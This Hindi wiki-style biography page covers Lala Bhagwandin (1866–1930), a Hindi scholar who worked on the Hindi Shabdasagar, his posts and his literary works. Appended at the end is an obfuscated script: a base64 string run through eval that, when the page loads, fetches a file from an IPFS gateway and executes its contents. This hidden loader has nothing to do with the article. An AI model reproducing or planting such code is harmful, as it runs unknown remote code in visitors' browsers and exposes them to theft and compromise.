लाला भगवानदीन

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

लाला भगवानदीन (जन्म- सन 1866, फ़तेहपुर, उत्तर प्रदेश; मृत्यु- 1930) प्रसिद्ध साहित्य सेवी और हिन्दी के विद्वान थे। इन्होंने हिन्दी शब्दसागर के निर्माण में बहुमूल्य योगदान दिया था।[1]

  • लाला भगवानदीन का जन्म बरबट गाँव, फ़तेहपुर (उत्तर प्रदेश) में सन 1866 में हुआ था।
  • वर्ष 1907 में भगवानदीन उर्दू के शिक्षक नियुक्त हुए थे।
  • ये छन्दशास्त्र के ज्ञाता थे। काशी (वर्तमान बनारस) मुख्य रूप से इनकी कर्मस्थली रही थी।
  • डॉ. श्यामसुन्दर दास तथा आचार्य रामचन्द्र शुक्ल के ये प्रमुख सहयोगी रहे थे।
  • लाला भगवानदीन गया से प्रकाशित होने वाली पत्रिका के सम्पादक भी रहे।
  • धर्म और विज्ञान, वीर प्रताप, वीर बालक इनकी प्रारम्भिक रचनाएँ थीं। 'रामचन्द्रिका', 'कविप्रिया', 'रसिकप्रिया कवितावली', 'बिहारी सतसई' की प्रामाणिक टीकाएँ भी इन्होंने लिखीं।
  • ‘अलंकार मंजूषा’, 'व्यंगार्थ मंजूषा’ हिन्दी काव्यशास्त्र की महत्वपूर्ण पुस्तक रही।
  • ‘नवीन बीन’ तथा ‘नदी में दीन’ लाला भगवानदीन के काव्य रचना संग्रह है। ‘वीर पंचरत्न’ वीरतापूर्ण काव्य संग्रह है।
  • वर्ष 1930 में लाला भगवानदीन स्वर्ग गमन कर गये।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. काशी के साहित्यकार (हिन्दी)। । अभिगमन तिथि: 11 जनवरी, 2014।

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>